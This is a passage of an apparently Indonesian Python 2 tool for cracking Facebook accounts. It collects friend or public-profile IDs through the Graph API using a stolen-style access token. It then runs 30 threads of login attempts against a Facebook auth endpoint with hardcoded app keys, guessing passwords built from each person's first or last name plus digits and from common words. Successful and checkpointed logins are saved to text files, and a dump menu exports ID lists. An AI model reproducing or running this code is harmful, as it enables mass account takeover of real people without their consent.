data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user.lower())+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m[Berhasil] ' + user.lower() + ' ❂ ' + pass4
oks.append(user.lower()+pass4)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m[Cekpoint] ' + user.lower() + ' ❂ ' + pass4
cek = open("out/ind1.txt", "a")
cek.write("ID:" +user.lower()+ " Pw:" +pass4+"\n")
cek.close()
cekpoint.append(user.lower()+pass4)
else:
pass5 = 'Anjing'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user.lower())+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m[Berhasil] ' + user.lower() + ' ❂ ' + pass5
oks.append(user.lower()+pass5)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m[Cekpoint] ' + user.lower() + ' ❂ ' + pass5
cek = open("out/ind1.txt", "a")
cek.write("ID:" +user.lower()+ " Pw:" +pass5+"\n")
cek.close()
cekpoint.append(user.lower()+pass5)
else:
pass6 = 'Bangsat'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user.lower())+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m[Berhasil] ' + user.lower() + ' ❂ ' + pass6
oks.append(user.lower()+pass6)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m[Cekpoint] ' + user.lower() + ' ❂ ' + pass6
cek = open("out/ind1.txt", "a")
cek.write("ID:" +user.lower()+ " Pw:" +pass6+"\n")
cek.close()
cekpoint.append(user.lower()+pass6)
else:
pass7 = 'Kontol'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user.lower())+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m[Berhasil] ' + user.lower() + ' ❂ ' + pass7
oks.append(user.lower()+pass7)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m[Cekpoint] ' + user.lower() + ' ❂ ' + pass7
cek = open("out/ind1.txt", "a")
cek.write("ID:" +user.lower()+ " Pw:" +pass7+"\n")
cek.close()
cekpoint.append(user.lower()+pass7)
else:
pass8 = 'Cantik'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user.lower())+"&locale=en_US&password="+(pass8)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m[Berhasil] ' + user.lower() + ' ❂ ' + pass8
oks.append(user.lower()+pass8)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m[Cekpoint] ' + user.lower() + ' ❂ ' + pass8
cek = open("out/ind1.txt", "a")
cek.write("ID:" +user.lower()+ " Pw:" +pass8+"\n")
cek.close()
cekpoint.append(user.lower()+pass8)
else:
pass9 = c['first_name']+'321'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user.lower())+"&locale=en_US&password="+(pass9)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m[Berhasil] ' + user.lower() + ' ❂ ' + pass9
oks.append(user.lower()+pass9)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m[Cekpoint] ' + user.lower() + ' ❂ ' + pass9
cek = open("out/ind1.txt", "a")
cek.write("ID:" +user.lower()+ " Pw:" +pass9+"\n")
cek.close()
cekpoint.append(user.lower()+pass9)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print '\033[1;97m[\033[1;93m✓\033[1;97m] \033[1;97mSelesai ....'
print"\033[1;97m[\033[1;93m+\033[1;97m] \033[1;97mTotal \033[1;92mOK\033[1;97m/\x1b[1;93mCP \033[1;97m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print '\033[1;97m[\033[1;93m!\033[1;97m] \033[1;97mCP file tersimpan : out/ind1.txt'
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
raw_input("\033[1;93m[\033[1;97m Kembali \033[1;93m]")
os.system("python2 vip.py")
########## CRACK BANGLADESH #######
def bangla():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print "\033[1;97m[\033[1;94m01\033[1;97m]\033[1;96m->\033[1;97m Crack dari daftar teman"
print "\033[1;97m[\033[1;94m02\033[1;97m]\033[1;96m->\033[1;97m Crack dari id publik/teman"
print "\033[1;97m[\033[1;94m03\033[1;97m]\033[1;96m->\033[1;97m Crack dari file"
print "\033[1;97m[\033[1;91m00\033[1;97m]\033[1;96m->\033[1;97m Kembali"
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
pilih_bangla()
#### PILIH BANGLA ####
def pilih_bangla():
reak = raw_input("\033[1;93m︻デ═一▸ \033[91m:\033[1;92m ")
if reak =="":
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
pilih_bangla()
elif reak =="1" or reak == "01":
os.system('clear')
print logo
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif reak =="2" or reak == "02":
os.system('clear')
print logo
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print " \033[1;94m ××× \033[1;97mCRACK BANGLADESH/PAKISTAN \033[1;94m××× "
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
dok = raw_input("\033[1;97m{\033[1;94m+\033[1;97m} ID publik/teman : ")
try:
jok = requests.get("https://graph.facebook.com/"+dok+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;97m{\033[1;94m✓\033[1;97m} Nama : "+op["name"]
except KeyError:
print"\033[1;97m[\033[1;94m!\033[1;97m] ID publik/teman tidak ada !"
raw_input("\n[ Kembali ]")
bangla()
except requests.exceptions.ConnectionError:
print"[!] Tidak ada koneksi !"
keluar()
r = requests.get("https://graph.facebook.com/"+dok+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif reak =="3" or reak == "03":
os.system('clear')
print logo
try:
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
idlist = raw_input('\033[1;97m{\033[1;94m?\033[1;97m} Nama File : ')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except KeyError:
print '\033[1;97m[!] File tidak ada ! '
raw_input('\n\033[1;92m[ \033[1;97mKembali \033[1;92m]')
except IOError:
print '\033[1;97m[!] File tidak ada !'
raw_input('\n\033[1;93m[ \033[1;97mKembali \033[1;93m]')
bangla()
elif reak =="0" or reak == "00":
menu()
else:
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
pilih_bangla()
print "\033[1;97m{\033[1;94m+\033[1;97m} Total ID : "+str(len(id))
print('\033[1;97m{\033[1;94m?\033[1;97m} Stop CTRL+Z')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;97m{\033[1;94m•\033[1;97m} Crack Berjalan "+o),;sys.stdout.flush();time.sleep(1)
print "\n\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
#####MAIN_BANGLADESH#####
def main(arg):
global cpe,oke
ubd = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+ubd+'/?access_token='+toket)
x = json.loads(a.text)
bos1 = x['first_name']+'123'
data1 = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(ubd)+"&locale=en_US&password="+(bos1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
naga1 = json.load(data1)
if 'access_token' in naga1:
print '\033[1;92m[Berhasil] ' +ubd+' ❂ '+bos1
oke.append(ubd+bos1)
else:
if 'www.facebook.com' in naga1['error_msg']:
print '\033[1;94m[Cekpoint] ' +ubd+' ❂ '+bos1
cek = open("out/pakisbang.txt", "a")
cek.write("ID:" +ubd+ " Pw:" +bos1+"\n")
cek.close()
cpe.append(ubd+bos1)
else:
bos2 = x['first_name']+'1234'
data2 = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(ubd)+"&locale=en_US&password="+(bos2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
naga2 = json.load(data2)
if 'access_token' in naga2:
print '\033[1;92m[Berhasil] ' +ubd+' ❂ '+bos2
oke.append(ubd+bos2)
else:
if 'www.facebook.com' in naga2['error_msg']:
print '\033[1;94m[Cekpoint] ' +ubd+' ❂ '+bos2
cek = open("out/pakisbang.txt", "a")
cek.write("ID:" +ubd+ " Pw:" +bos2+"\n")
cek.close()
cpe.append(ubd+bos2)
else:
bos3 = x['first_name']+'12345'
data3 = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(ubd)+"&locale=en_US&password="+(bos3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
naga3 = json.load(data3)
if 'access_token' in naga3:
print '\033[1;92m[Berhasil] ' +ubd+' ❂ '+bos3
oke.append(ubd+bos3)
else:
if 'www.facebook.com' in naga3['error_msg']:
print '\033[1;94m[Cekpoint] ' +ubd+' ❂ '+bos3
cek = open("out/pakisbang.txt", "a")
cek.write("ID:" +ubd+ " Pw:" +bos3+"\n")
cek.close()
cpe.append(ubd+bos3)
else:
bos4 = '786786'
data4 = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(ubd)+"&locale=en_US&password="+(bos4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
naga4 = json.load(data4)
if 'access_token' in naga4:
print '\033[1;92m[Berhasil] ' +ubd+' ❂ '+bos4
oke.append(ubd+bos4)
else:
if 'www.facebook.com' in naga4['error_msg']:
print '\033[1;94m[Cekpoint] ' +ubd+' ❂ '+bos4
cek = open("out/pakisbang.txt", "a")
cek.write("ID:" +ubd+ " Pw:" +bos4+"\n")
cek.close()
cpe.append(ubd+bos4)
else:
bos5 = x['first_name']+'786'
data5 = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(ubd)+"&locale=en_US&password="+(bos5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
naga5 = json.load(data5)
if 'access_token' in naga5:
print '\033[1;92m[Berhasil] '+ubd+' ❂ '+bos5
oke.append(ubd+bos5)
else:
if 'www.facebook.com' in naga5['error_msg']:
print '\033[1;94m[Cekpoint] ' +ubd+' ❂ '+bos5
cek = open("out/pakisbang.txt", "a")
cek.write("ID:" +ubd+ " Pw:" +bos5+"\n")
cek.close()
cpe.append(ubd+bos5)
else:
bos6 = x['last_name']+'123'
data6 = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(ubd)+"&locale=en_US&password="+(bos6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
naga6 = json.load(data6)
if 'access_token' in naga6:
print '\033[1;92m[Berhasil] ' +ubd+' ❂ '+bos6
oke.append(ubd+bos6)
else:
if 'www.facebook.com' in naga6['error_msg']:
print '\033[1;94m[Cekpoint] ' +ubd+' ❂ '+bos6
cek = open("out/pakisbang.txt", "a")
cek.write("ID:" +ubd+ " Pw:" +bos6+"\n")
cek.close()
cpe.append(ubd+bos6)
else:
bos7 = x['last_name']+'1234'
data7 = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(ubd)+"&locale=en_US&password="+(bos7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
naga7 = json.load(data7)
if 'access_token' in naga7:
print '\033[1;92m[Berhasil] ' +ubd+' ❂ '+bos7
oke.append(ubd+bos7)
else:
if 'www.facebook.com' in naga7['error_msg']:
print '\033[1;94m[Cekpoint] ' +ubd+' ❂ '+bos7
cek = open("out/pakisbang.txt", "a")
cek.write("ID:" +ubd+ " Pw:" +bos7+"\n")
cek.close()
cpe.append(ubd+bos7)
else:
bos8 = 'Pakistan'
data8 = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(ubd)+"&locale=en_US&password="+(bos8)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
naga8 = json.load(data8)
if 'access_token' in naga8:
print '\033[1;92m[Berhasil] ' +ubd+' ❂ '+bos8
oke.append(ubd+bos8)
else:
if 'www.facebook.com' in naga8['error_msg']:
print '\033[1;94m[Cekpoint] ' +ubd+' ❂ ' +bos8
cek = open("out/pakisbang.txt", "a")
cek.write("ID:" +ubd+ " Pw:" +bos8+"\n")
cek.close()
cpe.append(ubd+bos8)
else:
bos9 = x['last_name']+'786'
data9 = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(ubd)+"&locale=en_US&password="+(bos9)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
naga9 = json.load(data9)
if 'access_token' in naga9:
print '\033[1;92m[Berhasil] ' +ubd+' ❂ '+bos9
oke.append(ubd+bos9)
else:
if 'www.facebook.com' in naga9['error_msg']:
print '\033[1;94m[Cekpoint] ' +ubd+' ❂ ' +bos9
cek = open("out/pakisbang.txt", "a")
cek.write("ID:" +ubd+ " Pw:" +bos9+"\n")
cek.close()
cpe.append(ubd+bos9)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print '\033[1;97m[\033[1;94m✓\033[1;97m] \033[1;97mSelesai ....'
print"\033[1;97m[\033[1;94m+\033[1;97m] \033[1;97mTotal \033[1;92mOK\033[1;97m/\x1b[1;94mCP \033[1;97m: \033[1;92m"+str(len(oke))+"\033[1;97m/\033[1;94m"+str(len(cpe))
print '\033[1;97m[\033[1;94m!\033[1;97m] \033[1;97mCP file tersimpan : out/pakisbang.txt'
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
raw_input("\033[1;93m[\033[1;97m Kembali \033[1;93m]")
os.system("python2 vip.py")
##########CRACK SANDI#######
def sandi():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print "\033[1;97m[\033[1;96m01\033[1;97m]\033[1;96m->\033[1;97m Crack dari daftar teman"
print "\033[1;97m[\033[1;96m02\033[1;97m]\033[1;96m->\033[1;97m Crack dari id publik/teman"
print "\033[1;97m[\033[1;96m03\033[1;97m]\033[1;96m->\033[1;97m Crack dari file"
print "\033[1;97m[\033[1;91m00\033[1;97m]\033[1;96m->\033[1;97m Kembali"
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
pilih_sandi()
def pilih_sandi():
weak = raw_input("\033[1;93m︻デ═一▸ \033[91m:\033[1;92m ")
if weak =="":
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
pilih_sandi()
elif weak =="1" or weak =="01":
os.system('clear')
print logo
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print "\033[1;93m ××× \033[1;97mBUAT LIST PASSWORD\033[1;93m ×××"
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print ("\033[1;97m{\033[1;96m?\033[1;97m} Sandi 1 : NamaDepan123 ")
print ("\033[1;97m{\033[1;96m?\033[1;97m} Sandi 2 : NamaDepan1234 ")
print ("\033[1;97m{\033[1;96m?\033[1;97m} Sandi 3 : NamaDepan12345 ")
sandi4 = raw_input("\033[1;97m{\033[1;96m?\033[1;97m} Sandi 4 : ")
sandi5 = raw_input("\033[1;97m{\033[1;96m?\033[1;97m} Sandi 5 : ")
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif weak =="2" or weak =="02":
os.system('clear')
print logo
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print "\033[1;93m ××× \033[1;97mBUAT LIST PASSWORD\033[1;93m ×××"
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print ("\033[1;97m{\033[1;96m?\033[1;97m} Sandi 1 : NamaDepan123 ")
print ("\033[1;97m{\033[1;96m?\033[1;97m} Sandi 2 : NamaDepan1234 ")
print ("\033[1;97m{\033[1;96m?\033[1;97m} Sandi 3 : NamaDepan12345 ")
sandi4 = raw_input("\033[1;97m{\033[1;96m?\033[1;97m} Sandi 4 : ")
sandi5 = raw_input("\033[1;97m{\033[1;96m?\033[1;97m} Sandi 5 : ")
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
idt = raw_input("\033[1;97m{\033[1;96m+\033[1;97m} ID publik/teman : ")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;97m{\033[1;96m✓\033[1;97m} Nama : "+op["name"]
except KeyError:
print"[!] ID publik tidak ditemukan!"
raw_input("\n[ Kembali ]")
sandi()
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif weak =="3" or weak =="03":
os.system('clear')
print logo
try:
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print "\033[1;93m ××× \033[1;97mBUAT LIST PASSWORD\033[1;93m ×××"
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print ("\033[1;97m{\033[1;96m?\033[1;97m} Sandi 1 : NamaDepan123 ")
print ("\033[1;97m{\033[1;96m?\033[1;97m} Sandi 2 : NamaDepan1234 ")
print ("\033[1;97m{\033[1;96m?\033[1;97m} Sandi 3 : NamaDepan12345 ")
sandi4 = raw_input("\033[1;97m{\033[1;96m?\033[1;97m} Sandi 4 : ")
sandi5 = raw_input("\033[1;97m{\033[1;96m?\033[1;97m} Sandi 5 : ")
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
idlist = raw_input('\033[1;97m{\033[1;96m?\033[1;97m} Nama File : ')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except KeyError:
print '\033[1;91m[!] File tidak ada'
raw_input('\n\033[1;92m[ \033[1;97mKembali \033[1;92m]')
sandi()
except IOError:
print '\033[1;91m[!] File tidak ada'
raw_input('\n\033[1;92m[ \033[1;97mKembali \033[1;92m]')
sandi()
elif weak =="0" or weak =="00":
menu()
else:
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
pilih_indo()
print "\033[1;97m{\033[1;96m+\033[1;97m} Total ID : "+str(len(id))
print('\033[1;97m{\033[1;96m?\033[1;97m} Stop CTRL+Z')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;97m{\033[1;96m•\033[1;97m} Crack Berjalan "+o),;sys.stdout.flush();time.sleep(1)
print "\n\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
#####CRACK SANDI#####
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user.lower()+'/?access_token='+toket)
c = json.loads(a.text)
sandi1 = c['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user.lower())+"&locale=en_US&password="+(sandi1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m[Berhasil] ' + user.lower() + ' ❂ ' + sandi1
oks.append(user.lower()+sandi1)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;91m[Cekpoint] ' + user.lower() + ' ❂ ' + sandi1
cek = open("out/world.txt", "a")
cek.write("ID:" +user.lower()+ " Pw:" +sandi1+"\n")
cek.close()
cekpoint.append(user.lower()+sandi1)
else:
sandi2 = c['first_name']+'1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user.lower())+"&locale=en_US&password="+(sandi2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m[Berhasil] ' + user.lower() + ' ❂ ' + sandi2
oks.append(user.lower()+sandi2)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;91m[Cekpoint] ' + user.lower() + ' ❂ ' + sandi2
cek = open("out/world.txt", "a")
cek.write("ID:" +user.lower()+ " Pw:" +sandi2+"\n")
cek.close()
cekpoint.append(user.lower()+sandi2)
else:
sandi3 = c['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user.lower())+"&locale=en_US&password="+(sandi3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m[Berhasil] ' + user.lower() + ' ❂ ' + sandi3
oks.append(user.lower()+sandi3)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;91m[Cekpoint] ' + user.lower() + ' ❂ ' + sandi3
cek = open("out/world.txt", "a")
cek.write("ID:" +user.lower()+ " Pw:" +sandi3+"\n")
cek.close()
cekpoint.append(user.lower()+sandi3)
else:
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user.lower())+"&locale=en_US&password="+(sandi4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m[Berhasil] ' + user.lower() + ' ❂ ' + sandi4
oks.append(user.lower()+sandi4)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;91m[Cekpoint] ' + user.lower() + ' ❂ ' + sandi4
cek = open("out/world.txt", "a")
cek.write("ID:" +user.lower()+ " Pw:" +sandi4+"\n")
cek.close()
cekpoint.append(user.lower()+sandi4)
else:
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user.lower())+"&locale=en_US&password="+(sandi5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m[Berhasil] ' + user.lower() + ' ❂ ' + sandi5
oks.append(user.lower()+sandi5)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;91m[Cekpoint] ' + user.lower() + ' ❂ ' + sandi5
cek = open("out/world.txt", "a")
cek.write("ID:" +user.lower()+ " Pw:" +sandi5+"\n")
cek.close()
cekpoint.append(user.lower()+sandi5)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print '\033[1;97m[\033[1;96m✓\033[1;97m] \033[1;97mSelesai ....'
print"\033[1;97m[\033[1;96m+\033[1;97m] \033[1;97mTotal \033[1;92mOK\033[1;97m/\x1b[1;91mCP \033[1;97m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;91m"+str(len(cekpoint))
print("\033[1;97m[\033[1;96m!\033[1;97m] \033[1;97mCP file tersimpan : out/world.txt")
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
raw_input("\033[1;93m[\033[1;97m Kembali \033[1;93m]")
os.system("python2 vip.py")
######### DUMP ##########
def dump():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
menu()
os.system('clear')
print logo
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print "\033[1;97m[\033[1;95m01\033[1;97m]\033[1;96m->\033[1;97m Ambil ID dari daftar teman "
print "\033[1;97m[\033[1;95m02\033[1;97m]\033[1;96m->\033[1;97m Ambil ID dari publik/teman "
print "\033[1;97m[\033[1;91m00\033[1;97m]\033[1;96m->\033[1;97m Kembali "
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
dump_pilih()
def dump_pilih():
cuih = raw_input("\033[1;93m︻デ═一▸ \033[91m:\033[1;92m ")
if cuih =="":
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
dump_pilih()
elif cuih =="1" or cuih =="01":
id_teman()
elif cuih =="2" or cuih =="02":
idfrom_teman()
elif cuih =="0" or cuih =="00":
menu()
else:
print"\033[1;97m[\033[1;91m!\033[1;97m] Isi Yg Benar !"
dump_pilih()
##### ID TEMAN #####
def id_teman():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;97m[!] Token invalid"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('clear')
print logo
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
r=requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z=json.loads(r.text)
jalan('\033[1;97m[\033[1;95m•\033[1;97m] \033[1;97mMengambil semua ID teman \033[1;97m...')
bz = open('out/id_teman.txt','w')
for a in z['data']:
idteman.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[\033[1;95m"+str(len(idteman))+"\033[1;97m]\033[1;97m =>"),;sys.stdout.flush();time.sleep(0.0050)
print '\033[1;93m'+a['id']
bz.close()
print '\r\033[1;97m[\033[1;95m✓\033[1;97m] \033[1;97mSukses Mengambil ID \033[1;97m....'
print"\r\033[1;97m[\033[1;95m!\033[1;97m] \033[1;97mTotal ID : %s"%(len(idteman))
done = raw_input("\r\033[1;97m[\033[1;95m?\033[1;97m] \033[1;97mSimpan nama file : ")
os.rename('out/id_teman.txt','out/'+done)
print("\r\033[1;97m[\033[1;95m+\033[1;97m] \033[1;97mFile tersimpan : \033[1;97mout/"+done)
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
raw_input("\033[1;93m[ \033[1;97mKembali \033[1;93m]")
os.system("python2 vip.py")
except IOError:
